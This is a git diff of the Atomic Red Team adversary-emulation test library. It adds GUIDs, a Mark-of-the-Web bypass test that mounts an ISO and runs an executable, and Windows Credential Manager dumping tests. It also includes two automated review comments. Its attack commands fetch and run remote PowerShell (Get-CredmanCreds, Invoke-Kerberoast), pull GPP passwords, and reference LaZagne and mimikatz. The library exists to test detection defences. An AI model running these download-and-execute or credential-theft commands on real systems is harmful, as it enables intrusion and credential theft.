-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -68,10 +72,14 @@ Successful test execution will either display the credentials found in the GPP f
**Supported Platforms:** Windows
+**auto_generated_guid:** e9584f82-322c-474a-b831-940fd8b4455c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gpp_script_url | URL of the Get-GPPPassword PowerShell Script | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1|
| gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1|
@@ -92,7 +100,7 @@ Get-GPPPassword -Verbose
##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
##### Check Prereq Commands:
```powershell
-if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 }
+if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -102,7 +110,7 @@ Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md
index 150c669b..9bcf155c 100644
--- a/atomics/T1552.007/T1552.007.md
+++ b/atomics/T1552.007/T1552.007.md
@@ -19,10 +19,14 @@ A Kubernetes secret is an object that lets users store and manage sensitive info
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 43c3a49d-d15c-45e6-b303-f6e177e44a9a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| namespace | K8s namespace to list | String | default|
@@ -48,6 +52,10 @@ Access the Kubernetes service account access token stored within a container in
**Supported Platforms:** Linux
+**auto_generated_guid:** 788e0019-a483-45da-bcfe-96353d46820f
+
+
+
@@ -69,7 +77,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-pod
##### Description: Verify docker is installed.
##### Check Prereq Commands:
```sh
-which docker
+which docker
```
##### Get Prereq Commands:
```sh
@@ -78,7 +86,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt
##### Description: Verify docker service is running.
##### Check Prereq Commands:
```sh
-sudo systemctl status docker
+sudo systemctl status docker
```
##### Get Prereq Commands:
```sh
@@ -87,7 +95,7 @@ sudo systemctl start docker
##### Description: Verify kind is in the path.
##### Check Prereq Commands:
```sh
-which kind
+which kind
```
##### Get Prereq Commands:
```sh
@@ -98,7 +106,7 @@ mv kind /usr/bin/kind
##### Description: Verify kind-atomic-cluster is created
##### Check Prereq Commands:
```sh
-sudo kind get clusters
+sudo kind get clusters
```
##### Get Prereq Commands:
```sh
@@ -107,7 +115,7 @@ sudo kind create cluster --name atomic-cluster
##### Description: Verify kubectl is in path
##### Check Prereq Commands:
```sh
-which kubectl
+which kubectl
```
##### Get Prereq Commands:
```sh
@@ -118,7 +126,7 @@ mv kubectl /usr/bin/kubectl
##### Description: Verify atomic-pod is running.
##### Check Prereq Commands:
```sh
-kubectl --context kind-atomic-cluster get pods |grep atomic-pod
+kubectl --context kind-atomic-cluster get pods |grep atomic-pod
```
##### Get Prereq Commands:
```sh
diff --git a/atomics/T1553.001/T1553.001.md b/atomics/T1553.001/T1553.001.md
index 93bc43cf..82a30cb0 100644
--- a/atomics/T1553.001/T1553.001.md
+++ b/atomics/T1553.001/T1553.001.md
@@ -19,10 +19,14 @@ Gatekeeper Bypass via command line
**Supported Platforms:** macOS
+**auto_generated_guid:** fb3d46c6-9480-4803-8d7d-ce676e1f1a9b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| app_path | Path to app to be used | Path | myapp.app|
diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md
index c17ef4a6..c1386bca 100644
--- a/atomics/T1553.004/T1553.004.md
+++ b/atomics/T1553.004/T1553.004.md
@@ -31,10 +31,14 @@ Creates a root CA with openssl
**Supported Platforms:** Linux
+**auto_generated_guid:** 9c096ec4-fd42-419d-a762-d64cc950627e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cert_filename | Path of the CA certificate we create | Path | rootCA.crt|
| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
@@ -70,10 +74,14 @@ Creates a root CA with openssl
**Supported Platforms:** Linux
+**auto_generated_guid:** 53bcf8a0-1549-4b85-b919-010c56d724ff
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cert_filename | CA file name | Path | rootCA.crt|
| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
@@ -94,7 +102,7 @@ echo sudo update-ca-certificates
##### Description: Verify the certificate exists. It generates if not on disk.
##### Check Prereq Commands:
```sh
-if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
+if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
@@ -114,10 +122,14 @@ Creates a root CA with openssl
**Supported Platforms:** macOS
+**auto_generated_guid:** cc4a0b8c-426f-40ff-9426-4e10e5bf4c49
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cert_filename | CA file name | Path | rootCA.crt|
| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
@@ -137,7 +149,7 @@ sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.key
##### Description: Verify the certificate exists. It generates if not on disk.
##### Check Prereq Commands:
```sh
-if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
+if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
@@ -157,10 +169,14 @@ Creates a root CA with Powershell
**Supported Platforms:** Windows
+**auto_generated_guid:** 76f49d86-5eb1-461a-a032-a480f86652f1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| pfx_path | Path of the certificate | Path | rootCA.cer|
@@ -191,7 +207,7 @@ catch {
##### Description: Verify the certificate exists. It generates if not on disk.
##### Check Prereq Commands:
```powershell
-if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
+if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -212,10 +228,14 @@ Creates a root CA with certutil
**Supported Platforms:** Windows
+**auto_generated_guid:** 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| pfx_path | Path of the certificate | Path | $env:Temp\rootCA2.cer|
@@ -240,7 +260,7 @@ Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore |
##### Description: Certificate must exist at specified location (#{pfx_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
+if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md
new file mode 100644
index 00000000..805a501a
--- /dev/null
+++ b/atomics/T1553.005/T1553.005.md
@@ -0,0 +1,118 @@
+# T1553.005 - Mark-of-the-Web Bypass
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005)
+Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
+
+Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)
+
+## Atomic Tests
+
+- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image)
+
+- [Atomic Test #2 - Mount an ISO image and run executable from the ISO](#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso)
+
+
+
+
+## Atomic Test #1 - Mount ISO image
+Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 002cca30-4778-4891-878a-aaffcfa502fa
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\T1553.005.iso|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Mount-DiskImage -ImagePath "#{path_of_iso}"
+```
+
+#### Cleanup Commands:
+```powershell
+Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+```
+
+
+
+
+
+
+
+## Atomic Test #2 - Mount an ISO image and run executable from the ISO
+Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO.
+Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!".
+ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 42f22b00-0242-4afc-a61b-0da05041f9cc
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+$driveLetter = ($keep | Get-Volume).DriveLetter
+invoke-item "$($driveLetter):\hello.exe"
+```
+
+#### Cleanup Commands:
+```powershell
+Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+Stop-process -name "hello" -Force -ErrorAction ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+```
+
+
+
+
+
diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml
new file mode 100644
index 00000000..e31b4c2a
--- /dev/null
+++ b/atomics/T1553.005/T1553.005.yaml
@@ -0,0 +1,61 @@
+attack_technique: T1553.005
+display_name: 'Subvert Trust Controls: Mark-of-the-Web Bypass'
+atomic_tests:
+- name: Mount ISO image
+ auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa
+ description: |
+ Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+ supported_platforms:
+ - windows
+ input_arguments:
+ path_of_iso:
+ description: Path to ISO file
+ type: path
+ default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+ prereq_command: |
+ if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+ executor:
+ command: |
+ Mount-DiskImage -ImagePath "#{path_of_iso}"
+ cleanup_command: |
+ Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+ name: powershell
+
+- name: Mount an ISO image and run executable from the ISO
+ auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
+ description: |-
+ Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO.
+ Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!".
+ ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+ supported_platforms:
+ - windows
+ input_arguments:
+ path_of_iso:
+ description: Path to ISO file
+ type: path
+ default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+ prereq_command: |
+ if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+ executor:
+ command: |
+ $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+ $driveLetter = ($keep | Get-Volume).DriveLetter
+ invoke-item "$($driveLetter):\hello.exe"
+ cleanup_command: |
+ Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+ Stop-process -name "hello" -Force -ErrorAction ignore
+ name: powershell
\ No newline at end of file
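Review bot: The prereq commands quote the path inconsistently: `Test-Path #{path_of_iso}` and `split-path #{path_of_iso}` are unquoted while `-OutFile "#{path_of_iso}"` on the next line is quoted, so a substituted PathToAtomicsFolder containing a space makes the check and directory creation fail while the download succeeds; the same pattern appears in both tests. Quote them as `if (Test-Path "#{path_of_iso}") {exit 0} else {exit 1}` and `New-Item -Type Directory (split-path "#{path_of_iso}") -ErrorAction ignore | Out-Null`. Test 1 mounts with a bare `Mount-DiskImage -ImagePath "#{path_of_iso}"` whereas test 2 passes `-StorageType ISO -Access ReadOnly`; the first test would benefit from the same explicit read-only mount so the two behave alike on the test host. Elsewhere in this commit a `[Net.ServicePointManager]::SecurityProtocol` line is added before remote downloads, and the two Invoke-WebRequest lines in get_prereq_command here would presumably need the same treatment to stay consistent.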
diff --git a/atomics/T1553.005/bin/FeelTheBurn.iso b/atomics/T1553.005/bin/FeelTheBurn.iso
new file mode 100644
index 00000000..491da79f
Binary files /dev/null and b/atomics/T1553.005/bin/FeelTheBurn.iso differ
diff --git a/atomics/T1553.005/bin/T1553.005.iso b/atomics/T1553.005/bin/T1553.005.iso
new file mode 100644
index 00000000..5f01ec95
Binary files /dev/null and b/atomics/T1553.005/bin/T1553.005.iso differ
diff --git a/atomics/T1555.001/T1555.001.md b/atomics/T1555.001/T1555.001.md
index 4639ef46..76b62aaf 100644
--- a/atomics/T1555.001/T1555.001.md
+++ b/atomics/T1555.001/T1555.001.md
@@ -27,10 +27,14 @@ To manage their credentials, users have to use additional credentials to access
**Supported Platforms:** macOS
+**auto_generated_guid:** 1864fdec-ff86-4452-8c30-f12507582a93
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cert_export | Specify the path of the certificates to export. | path | /tmp/certs.pem|
diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md
index c246dec0..d780ed3d 100644
--- a/atomics/T1555.003/T1555.003.md
+++ b/atomics/T1555.003/T1555.003.md
@@ -31,10 +31,14 @@ Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal
**Supported Platforms:** Windows
+**auto_generated_guid:** 8c05b133-d438-47ca-a630-19cc464c4622
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | File path for modified Sysinternals | String | $env:TEMP|
@@ -58,7 +62,7 @@ Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore
##### Description: Modified Sysinternals must be located at #{file_path}
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1}
+if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -82,10 +86,14 @@ Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep
**Supported Platforms:** macOS
+**auto_generated_guid:** c1402f7b-67ca-43a8-b5f3-3143abedc01b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| search_string | String to search Safari cookies to find. | string | coinbase|
@@ -113,10 +121,14 @@ LaZagne is an open source application used to retrieve passwords stored on a loc
**Supported Platforms:** Windows
+**auto_generated_guid:** 9a2915b3-3954-4cce-8c76-00fbf4dbd014
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| lazagne_path | Path to LaZagne | Path | PathToAtomicsFolder\T1555.003\bin\LaZagne.exe|
@@ -135,7 +147,7 @@ LaZagne is an open source application used to retrieve passwords stored on a loc
##### Description: LaZagne.exe must exist on disk at specified location (#{lazagne_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
+if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md
index c08e2e0b..67f4c9ca 100644
--- a/atomics/T1555/T1555.md
+++ b/atomics/T1555/T1555.md
@@ -6,6 +6,10 @@
- [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba)
+- [Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]](#atomic-test-2---dump-credentials-from-windows-credential-manager-with-powershell-windows-credentials)
+
+- [Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]](#atomic-test-3---dump-credentials-from-windows-credential-manager-with-powershell-web-credentials)
+
@@ -16,6 +20,10 @@ them to $env:TEMP\windows-credentials.txt
**Supported Platforms:** Windows
+**auto_generated_guid:** 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
+
+
+
@@ -23,7 +31,8 @@ them to $env:TEMP\windows-credentials.txt
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
```
@@ -43,7 +52,7 @@ try {
$process = "winword"
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -53,4 +62,60 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
+
+
+
+## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
+This module will extract the credentials from Windows Credential Manager
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c89becbe-1758-4e7d-a0f4-97d2188a23e3
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
+This module will extract the credentials from Windows Credential Manager
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8fd5a296-6772-4766-9991-ff4e92af7240
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
+```
+
+
+
+
+
+
diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml
index 898b959a..e5decf7f 100644
--- a/atomics/T1555/T1555.yaml
+++ b/atomics/T1555/T1555.yaml
@@ -23,8 +23,29 @@ atomic_tests:
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
cleanup_command: |
Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
name: powershell
+- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
+ auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
+ description: This module will extract the credentials from Windows Credential Manager
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force
+- name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
+ auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
+ description: This module will extract the credentials from Windows Credential Manager
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
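Review bot: The two new tests download and IEX a remote script (Get-PasswordVaultCredentials / Get-CredManCreds) without the `[Net.ServicePointManager]::SecurityProtocol` line this same hunk adds to test 1, so they would presumably hit the download failure on older hosts that the test 1 change is meant to avoid; the same one-line prefix belongs in both new `command:` blocks. The added assignment also replaces the enabled protocol set rather than extending it, which disables anything newer the host already negotiates; prefer `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12`, and the same applies to the identical line added in T1558.003.yaml. The `description:` text is word-for-word identical for both tests and does not say which vault each one reads; the test 2 entry should say it enumerates the Windows Credentials vault and the test 3 entry the Web Credentials vault, matching the bracketed suffix in their names. Pinning the script URL to a commit hash is good and should be kept if the source is ever updated.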
diff --git a/atomics/T1556.002/T1556.002.md b/atomics/T1556.002/T1556.002.md
index a8dcd535..19efee24 100644
--- a/atomics/T1556.002/T1556.002.md
+++ b/atomics/T1556.002/T1556.002.md
@@ -19,10 +19,14 @@ Uses PowerShell to install and register a password filter DLL. Requires a reboot
**Supported Platforms:** Windows
+**auto_generated_guid:** a7961770-beb5-4134-9674-83d7e1fa865c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_dll | Path to DLL to be installed and registered | Path | PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll|
@@ -46,7 +50,7 @@ Restart-Computer -Confirm
##### Description: AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{input_dll}) {exit 0} else {exit 1}
+if (Test-Path #{input_dll}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md
index 26058d91..c08b28e8 100644
--- a/atomics/T1558.001/T1558.001.md
+++ b/atomics/T1558.001/T1558.001.md
@@ -21,10 +21,14 @@ The generated ticket is injected in a new empty Windows session and discarded af
**Supported Platforms:** Windows
+**auto_generated_guid:** 9726592a-dabc-4d4d-81cd-44070008b3af
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain_sid | SID of the targeted domain, if you keep default it will automatically get the current domain SID | string | S-1-5-21-DEFAULT|
| domain | Targeted domain FQDN | string | example.com|
@@ -98,7 +102,7 @@ Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md
index f2312394..a3155891 100644
--- a/atomics/T1558.003/T1558.003.md
+++ b/atomics/T1558.003/T1558.003.md
@@ -28,6 +28,10 @@ If the testing domain doesn't have any service principal name configured, there
**Supported Platforms:** Windows
+**auto_generated_guid:** 3f987809-3681-43c8-bcd8-b3ff3a28533a
+
+
+
@@ -35,6 +39,7 @@ If the testing domain doesn't have any service principal name configured, there
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl
```
diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml
index 1aab927f..e941e8ec 100644
--- a/atomics/T1558.003/T1558.003.yaml
+++ b/atomics/T1558.003/T1558.003.yaml
@@ -14,6 +14,7 @@ atomic_tests:
- windows
executor:
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl
name: powershell
diff --git a/atomics/T1559.002/T1559.002.md b/atomics/T1559.002/T1559.002.md
index 191c83d5..e7a4580a 100644
--- a/atomics/T1559.002/T1559.002.md
+++ b/atomics/T1559.002/T1559.002.md
@@ -23,6 +23,10 @@ Executes commands via DDE using Microsfot Word
**Supported Platforms:** Windows
+**auto_generated_guid:** f592ba2a-e9e8-4d62-a459-ef63abd819fd
+
+
+
#### Run it with these steps!
@@ -53,6 +57,10 @@ When the word document opens it will prompt the user to click ok on a dialogue b
**Supported Platforms:** Windows
+**auto_generated_guid:** 47c21fb6-085e-4b0d-b4d2-26d72c3830b3
+
+
+
@@ -83,6 +91,10 @@ Word VBA Macro
**Supported Platforms:** Windows
+**auto_generated_guid:** cf91174c-4e74-414e-bec0-8d60a104d181
+
+
+
#### Run it with these steps!
diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md
index c5559b4f..a376ff85 100644
--- a/atomics/T1560.001/T1560.001.md
+++ b/atomics/T1560.001/T1560.001.md
@@ -32,10 +32,14 @@ When the test completes you should find the txt files from the %USERPROFILE% dir
**Supported Platforms:** Windows
